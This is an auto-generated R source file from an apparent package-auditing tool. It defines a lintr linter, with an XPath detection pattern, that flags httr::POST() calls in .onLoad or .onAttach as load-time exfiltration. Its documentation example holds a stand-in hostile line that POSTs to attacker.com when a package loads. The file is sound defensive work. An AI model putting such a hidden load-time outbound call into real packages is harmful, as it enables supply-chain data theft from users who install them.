# Generated by data-raw/generate_linters.R -- do not edit by hand.
# Source: pkgaudit rules database version 0.1.0
# Generated: 2026-06-27T14:45:46

#' Flag httr::POST() calls inside .onLoad or .onAttach.
#'
#' @details
#' **Lint message:** httr::POST() inside .onLoad or .onAttach sends an outbound HTTP POST
#'   request automatically at package load time.
#'
#' **Severity:** `warning`
#'
#' **MITRE ATT\&CK:** [T1041](https://attack.mitre.org/techniques/T1041/), [T1195.002](https://attack.mitre.org/techniques/T1195/002/)
#'
#' For full documentation of the targeted vulnerability, see the [pkgaudit documentation](https://tylerjssmith.github.io/pkgaudit).
#'
#' @return A linter function of class \code{linter}.
#'
#' @examples
#' \dontrun{
#' lintr::lint(
#'   text    = ".onLoad <- function(l, p) { httr::POST(\"https://attacker.com\") }",
#'   linters = onload_calls_httr_POST_linter()
#' )
#' }
#'
#' @export
onload_calls_httr_POST_linter <- function() {
  lintr::make_linter_from_xpath(
    xpath        = "//expr[ LEFT_ASSIGN and expr[1]/SYMBOL[text() = '.onLoad' or text() = '.onAttach'] and expr[FUNCTION][ .//expr[ SYMBOL_PACKAGE[text() = 'httr'] and NS_GET and SYMBOL_FUNCTION_CALL[text() = 'POST'] ] ] ]",
    lint_message = "httr::POST() inside .onLoad or .onAttach sends an outbound HTTP POST\n     request automatically at package load time.",
    type         = "warning"
  )()
}
